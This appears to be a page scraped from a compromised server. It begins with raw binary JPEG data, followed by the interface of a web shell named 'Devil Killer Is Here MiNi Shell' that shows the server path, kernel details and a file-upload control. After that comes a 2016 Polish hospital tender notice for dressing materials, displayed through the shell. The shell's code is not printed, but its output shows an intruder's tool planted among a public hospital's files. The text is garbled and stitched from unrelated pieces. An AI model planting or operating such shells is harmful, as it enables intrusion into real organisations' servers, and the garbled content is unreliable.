JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160119/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160119/6965-N-2016.html

<p class="kh_header"><b>Warszawa: DOSTAWA MATERIAŁÓW OPATRUNKOWYCH</b><br>
<b>Numer ogłoszenia: 6965 - 2016; data zamieszczenia: 19.01.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielny Publiczny Kliniczny Szpital Okulistyczny , ul. Józefa Sierakowskiego 13, 03-709 Warszawa, woj. mazowieckie, tel. 022 6187979.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.spkso.waw.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> DOSTAWA MATERIAŁÓW OPATRUNKOWYCH.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest dostawa materiałów opatrunkowych do Działu Farmacji Szpitalnej   
    mieszczącego się w siedzibie Samodzielnego Publicznego Klinicznego Szpitala Okulistycznego w  
    Warszawie, ul. J. Sierakowskiego 13. Szczegółową specyfikację materiałów opatrunkowych będących  
    przedmiotem zamówienia określa załącznik nr 1 do SIWZ.
2. Zamawiający dopuszcza składanie ofert częściowych na poszczególne pakiety określone w     
    załączniku nr 1:
1) pakiet 1 - materiały opatrunkowe I       (kompresy gaz.jał. )
2) pakiet 2 - materiały opatrunkowe II     (materiały różne)
3) pakiet 3 - materiały opatrunkowe III    (przylepce hipoalergiczne)
4) pakiet 4 - materiały opatrunkowe IV     (jałowe opatrunki oczne)
5) pakiet 5 - materiały opatrunkowe V      (opatrunki do mocowania kaniul)
6) pakiet 6 - materiały opatrunkowe VI     (mikrogąbki do osuszania pola operac.)
7) pakiet 7 - materiały opatrunkowe VII   (wchłanialna gąbka żelatynowa)
8) pakiet 8 - materiały opatrunkowe VIII (paski do zamykania ran - wzmocnione i elastyczne)
9) pakiet 9 - materiały opatrunkowe IX    (przylepce włókninowe hipoalergiczne)
10) pakiet 10 - materiały opatrunkowe X    (kompresy z waty celulozowej + dozowniki)
11) pakiet 11 - materiały opatrunkowe XI   (rękaw opatrunkowy na dłoń i przedramię)
12) pakiet 12 - materiały opatrunkowe XII (przylepce włókninowe z perforacją).</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.10-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 12.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki, dotyczące
     posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli   
        przepisy prawa nakładają obowiązek ich posiadania,
  
2. Zamawiający uzna, że wykonawca spełnia warunki udziału w postępowaniu, gdy  
    Wykonawca  złoży prawidłowo wszystkie dokumenty i oświadczenia wymienione w rozdziale    
    III SIWZ, a ponadto informacje zawarte w tych dokumentach będą zgodne z wymaganiami  
    określonym w SIWZ.
3. Analiza złożonych wraz z ofertą dokumentów i oświadczeń będzie stanowiła podstawę do   
    oceny spełniania warunków udziału w postępowaniu oraz do stwierdzenia braku podstaw  
    do wykluczenia wg formuły spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki, dotyczące
        posiadania wiedzy i doświadczenia,
 2. Wykonawca może polegać na wiedzy i doświadczeniu
    innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków.   
    Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie  
    dysponował tymi zasobami w trakcie realizacji zamówienia, w szczególności przedstawiając  
    w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji  
    niezbędnych zasobów na potrzeby wykonania zamówienia.
3. Podmiot, który zobowiązał się do udostępnienia zasobów zgodnie z pkt.2, odpowiada  
    solidarnie z wykonawcą za szkodę zamawiającego powstałą wskutek nieudostępnienia tych  

4. Zamawiający uzna, że wykonawca spełnia warunki udziału w postępowaniu, gdy  
    Wykonawca  złoży prawidłowo wszystkie dokumenty i oświadczenia wymienione w rozdziale    
    III SIWZ, a ponadto informacje zawarte w tych dokumentach będą zgodne z wymaganiami  
    określonym w SIWZ.
5. Analiza złożonych wraz z ofertą dokumentów i oświadczeń będzie stanowiła podstawę do   
    oceny spełniania warunków udziału w postępowaniu oraz do stwierdzenia braku podstaw  
    do wykluczenia wg formuły spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki, dotyczące
        dysponowania odpowiednim potencjałem technicznym 
   
2. Wykonawca może polegać na potencjale technicznym
    innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków.   
    Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie  
    dysponował tymi zasobami w trakcie realizacji zamówienia, w szczególności przedstawiając  
    w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji  
    niezbędnych zasobów na potrzeby wykonania zamówienia.
3. Podmiot, który zobowiązał się do udostępnienia zasobów zgodnie z pkt.2, odpowiada  
    solidarnie z wykonawcą za szkodę zamawiającego powstałą wskutek nieudostępnienia tych  

4. Zamawiający uzna, że wykonawca spełnia warunki udziału w postępowaniu, gdy  
    Wykonawca  złoży prawidłowo wszystkie dokumenty i oświadczenia wymienione w rozdziale    
    III SIWZ, a ponadto informacje zawarte w tych dokumentach będą zgodne z wymaganiami  
    określonym w SIWZ.
5. Analiza złożonych wraz z ofertą dokumentów i oświadczeń będzie stanowiła podstawę do   
    oceny spełniania warunków udziału w postępowaniu oraz do stwierdzenia braku podstaw  
    do wykluczenia wg formuły spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki, dotyczące
  
    dysponowania osobami zdolnymi do  
        wykonania zamówienia,
 
2. Wykonawca może polegać na osobach zdolnych do wykonania zamówienia 
    innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków.   
    Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie  
    dysponował tymi zasobami w trakcie realizacji zamówienia, w szczególności przedstawiając  
    w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji  
    niezbędnych zasobów na potrzeby wykonania zamówienia.
3. Podmiot, który zobowiązał się do udostępnienia zasobów zgodnie z pkt.2, odpowiada  
    solidarnie z wykonawcą za szkodę zamawiającego powstałą wskutek nieudostępnienia tych  

4. Zamawiający uzna, że wykonawca spełnia warunki udziału w postępowaniu, gdy  
    Wykonawca  złoży prawidłowo wszystkie dokumenty i oświadczenia wymienione w rozdziale    
    III SIWZ, a ponadto informacje zawarte w tych dokumentach będą zgodne z wymaganiami  
    określonym w SIWZ.
5. Analiza złożonych wraz z ofertą dokumentów i oświadczeń będzie stanowiła podstawę do   
    oceny spełniania warunków udziału w postępowaniu oraz do stwierdzenia braku podstaw  
    do wykluczenia wg formuły spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki, dotyczące
 sytuacji ekonomicznej i finansowej.
2. Wykonawca może polegać na zdolnościach finansowych lub ekonomicznych  
    innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków.   
    Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie  
    dysponował tymi zasobami w trakcie realizacji zamówienia, w szczególności przedstawiając  
    w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji  
    niezbędnych zasobów na potrzeby wykonania zamówienia.
3. Podmiot, który zobowiązał się do udostępnienia zasobów zgodnie z pkt.2, odpowiada  
    solidarnie z wykonawcą za szkodę zamawiającego powstałą wskutek nieudostępnienia tych  

4. Zamawiający uzna, że wykonawca spełnia warunki udziału w postępowaniu, gdy  
    Wykonawca  złoży prawidłowo wszystkie dokumenty i oświadczenia wymienione w rozdziale    
    III SIWZ, a ponadto informacje zawarte w tych dokumentach będą zgodne z wymaganiami  
    określonym w SIWZ.
5. Analiza złożonych wraz z ofertą dokumentów i oświadczeń będzie stanowiła podstawę do   
    oceny spełniania warunków udziału w postępowaniu oraz do stwierdzenia braku podstaw  
    do wykluczenia wg formuły spełnia/nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Dokumenty dopuszczające oferowane wyroby medyczne do obrotu i używania - zgodnie z     
    wymogami ustawy z dnia 20 maja 2010 r. o wyrobach medycznych (tekst jednolity - Dz.U. z  
    2015 r. poz. 876), tj.
    - Certyfikat lub deklarację zgodności z wymaganiami zasadniczymi dla wyrobu medycznego  
       oznakowanego znakiem CE.</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>INFORMACJE UZUPEŁNIAJĄCE
      1) Wymagania jakie musi spełniać oferta składana przez dwa lub więcej podmiotów   
     ubiegających się wspólnie o udzielenie zamówienia (np. konsorcja, spółki cywilne):
a) w odniesieniu do wymagań postawionych przez Zamawiającego, każdy z Wykonawców  
występujących wspólnie, oddzielnie musi udokumentować, że nie podlega wykluczeniu na  
podstawie art. 24 ust. 1 ustawy PZP;
b) wiedzę i doświadczenie wymagane od Wykonawców w sumie muszą udokumentować  
podmioty ubiegające się wspólnie o udzielenie zamówienia; 
c) oferta musi być podpisana w taki sposób, by prawnie zobowiązywała wszystkich  
Wykonawców występujących wspólnie;
d) Wykonawcy występujący wspólnie muszą ustanowić pełnomocnika do reprezentowania ich  
w postępowaniu o udzielenie niniejszego zamówienia lub do reprezentowania ich  
w postępowaniu oraz zawarcia umowy o udzielenie przedmiotowego zamówienia publicznego;
e) wszelka korespondencja oraz rozliczenia dokonywane będą wyłącznie z podmiotem  
występującym jako reprezentant pozostałych.
    2) W zakresie nieuregulowanym SIWZ, zastosowanie mają przepisy Rozporządzenia Prezesa  
  Rady Ministrów z dnia 19 lutego 2013 r. w sprawie rodzajów dokumentów, jakich może żądać  
  Zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane (Dz. U. z  
  dnia 19 lutego 2013 r. poz.231).</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 50.00</li>
<li>2 - Jakość - 50.00</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zakazuje się istotnych zmian postanowień zawartej Umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, z zastrzeżeniem ust. 2.
2.	Zmiany w Umowie mogą być dokonane jeżeli z powodu nadzwyczajnej zmiany stosunków spełnienie świadczenia byłoby połączone z nadmiernymi trudnościami albo groziłoby jednej ze stron rażącą stratą, a w szczególności:
1)	w razie zmiany stanu prawnego którejkolwiek ze Stron, niezależnego od jej woli;
2)	w zakresie dotyczącym terminu dostawy wyłącznie w następujących przypadkach:
a)	wystąpienia siły wyższej, w tym zdarzenia losowego wywołanego przez czynniki zewnętrzne, którego nie można było przewidzieć z pewnością, w szczególności zagrażającego bezpośrednio życiu lub zdrowiu ludzi lub grożącego powstaniem szkody w znacznych rozmiarach albo działań osób trzecich uniemożliwiających wykonanie prac, które to działania nie są konsekwencją winy którejkolwiek ze Stron,
b)	wystąpienia okoliczności leżących wyłącznie po stronie Zamawiającego, 
w szczególności wstrzymania dostawy,
c)	ograniczenia dostępności surowców służących do wykonania przedmiotu umowy,
d)	czasowego wstrzymania produkcji towarów lub braków towarów będących przedmiotem Umowy, w tym będące następstwem działania organów administracji publicznej,
mogą powodować odpowiednie przedłużenie terminu dostawy o czas niezbędny do należytego jej wykonania, nie dłużej jednak niż o okres tych okoliczności; 
3)	w zakresie  sposobu spełnienia świadczenia wyłącznie w następujących przypadkach:
a)	wystąpienia okoliczności spowodowanych nieprzewidywalną koniecznością dostawy towarów nie wymienionych w Umowie; Zamawiający w tym przypadku dopuszcza zakup towarów zamiennych, równoważnych (np. towarów w zamiennym opakowaniu lub towarów o tożsamej nazwie międzynarodowej innego producenta o innej nazwie handlowej), ale ich cena nie może przewyższać ceny towarów podstawowych. Wykonawca zobowiązany jest dostarczyć go na zasadach określonych w niniejszej Umowie,
b)	nie wykupienia pełnej ilości Przedmiotu dostawy; w tym przypadku Umowa może zostać przedłużona na czas niezbędny do realizacji przedmiotu Umowy, z uwzględnieniem faktu, iż okres przedłużenia Umowy nie może być dłuższy niż 12 miesięcy;
4)	w odniesieniu do zakresu przedmiotu świadczenia wyłącznie w następujących przypadkach:
a)	zmiany wielkości opakowania zbiorczego zaoferowanego produktu przy zachowaniu lub obniżeniu ceny jednostkowej określonej w Załączniku nr 1 do Umowy,
b)	zmiany numeru katalogowego lub nazewnictwa produktu, przy zachowaniu lub obniżeniu ceny jednostkowej określonej w Załączniku nr 1 do Umowy,
c)	zmiany ilości jednostek miary określonych dla poszczególnych produktów w Załączniku nr 1 do Umowy, z zastrzeżeniem, że nie może to powodować przekroczenia kwoty, o której mowa w § 4 ust. 1;
d)	zakontraktowania przez Narodowy Fundusz Zdrowia u Zamawiającego mniejszej w stosunku do oferowanej liczby świadczeń zdrowotnych lub po cenach niższych od ponoszonych przez Zamawiającego kosztów tych świadczeń, mających zasadniczy wpływ na sytuację majątkową strony; 
5)	w odniesieniu do wysokości wynagrodzenia wyłącznie w przypadkach:
a)	określonym w pkt 4 lit. d) powyżej;
b)	udzielania przez Wykonawcę upustów promocyjnych; w tym przypadku upusty będą obowiązywały również dla niniejszej Umowy.
c)	urzędowej zmiany stawek VAT; w takim przypadku zmiana ceny nastąpi z zachowaniem ceny netto, która pozostaje bez zmian;
d)	zmiany wysokości minimalnego wynagrodzenia za pracę ustalonego na podstawie art. 2 ust.3-5 ustawy z dnia 10 października 2002 r. o minimalnym wynagrodzeniu za pracę, jeżeli zmiany te będą miały wpływ na koszty wykonania zamówienia przez wykonawcę, poprzez zmianę wynagrodzenia Wykonawcy określonego w Umowie;
e)	zmiany zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości stawki składki na ubezpieczenie społeczne lub zdrowotne jeżeli zmiany te będą miały wpływ na koszty wykonania zamówienia przez wykonawcę, poprzez zmianę wynagrodzenia Wykonawcy określonego w Umowie.
3.	Zmiana postanowień Umowy, o której mowa w ust. 2 pkt 5) lit. c) - e) obowiązuje od dnia wejścia w życie przepisów prawa wprowadzających te zmiany, jednak w przypadku:
a) zmian przepisów, o których mowa w pkt 5) lit. c), zmiana wynagrodzenia     
     (uwzględnienie nowej stawki podatku VAT i związana z tym zmiana cen    
     jednostkowych brutto) nastąpi automatycznie w dacie określonej przez przepisy  
     wprowadzające zmianę stawki podatku VAT bez konieczności podpisywania  
     odrębnego aneksu;
b) zmian przepisów, o których mowa w ust.2 pkt 5) lit. d) i e), zmiana wynagrodzenia  
     nastąpi nie wcześniej niż od pierwszego dnia miesiąca następującego po miesiącu,    
     w którym Zamawiający zaakceptował wniosek Wykonawcy o zmianę  
     wynagrodzenia, o którym mowa w ust. 7, z uwzględnieniem postanowień ust. 8-11.
4.    W przypadku  zmiany przepisów, o której mowa w ust. 2 pkt 5) lit. c), do cen jednostkowych  
        netto określonych w ofercie Wykonawcy oraz w § 4 ust. 1, zostanie doliczona wartość  
        podatku VAT wynikająca z nowych przepisów.

5.    W przypadku zmiany przepisów, o której mowa w ust.2 pkt 5) lit. d), ceny jednostkowe netto      
        określone w ofercie Wykonawcy oraz w § 4 ust. 1, zostaną zmienione o kwotę    
        odpowiadającą wartości udokumentowanej przez Wykonawcę zmiany całkowitego kosztu  
        Wykonawcy wynikającej ze  zmiany wynagrodzenia osób bezpośrednio wykonujących  
        zamówienie do wysokości minimalnego wynagrodzenia określonego w nowych przepisach,  
        z uwzględnieniem zmiany wszystkich obciążeń publicznoprawnych związanych ze zmianą  
        minimalnego wynagrodzenia, proporcjonalnie do zaangażowania tych osób w wykonanie  
        zamówienia i wpływu ich pierwotnego wynagrodzenia na ceny określone w ofercie  
        Wykonawcy;

6.   W przypadku zmiany przepisów, o której mowa w ust. 2 pkt 5) lit. e), ceny jednostkowe netto   
       określone w ofercie Wykonawcy oraz w § 4 ust. 1, zostaną zmienione o kwotę odpowiadającą  
       wartości udokumentowanej przez Wykonawcę zmiany całkowitego kosztu Wykonawcy  
       wynikającej ze zmiany wynagrodzenia osób bezpośrednio wykonujących zamówienie w  
        związku ze zmianą zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu  
        zdrowotnemu lub wysokości stawki składki na ubezpieczenia społeczne lub zdrowotne  
        określonych w nowych przepisach przy zachowaniu dotychczasowej kwoty netto ich  
        wynagrodzenia, proporcjonalnie do zaangażowania tych osób w wykonanie zamówienia i  
        wpływu ich pierwotnego wynagrodzenia na ceny określone w ofercie Wykonawcy.

7. 	Wprowadzenie zmiany wysokości wynagrodzenia w przypadku zmiany przepisów, o których mowa w ust.2  pkt 5) lit. d) i  e), wymaga uprzedniego złożenia przez Wykonawcę wniosku o zmianę wynagrodzenia określonego w Umowie wraz z dokumentami uzasadniającymi bezpośredni wpływ tych zmian na koszty wykonania przedmiotu Umowy, a w szczególności: 
a)	szczegółowego kosztorysu uzasadniającego wpływ wynagrodzenia osób bezpośrednio wykonujących zamówienie na całkowite koszty Wykonawcy, łączną wartość netto oferty i ceny jednostkowe netto określone w ofercie Wykonawcy oraz uwzględniającego wszystkie pozostałe elementy mające wpływ na wysokość ceny oferty przed zmianą przepisów i po wprowadzeniu tej zmiany;
                           b) poświadczonych za zgodność z oryginałem dokumentów potwierdzających:
-   liczbę osób zaangażowanych bezpośrednio przy realizacji przedmiotu Umowy    
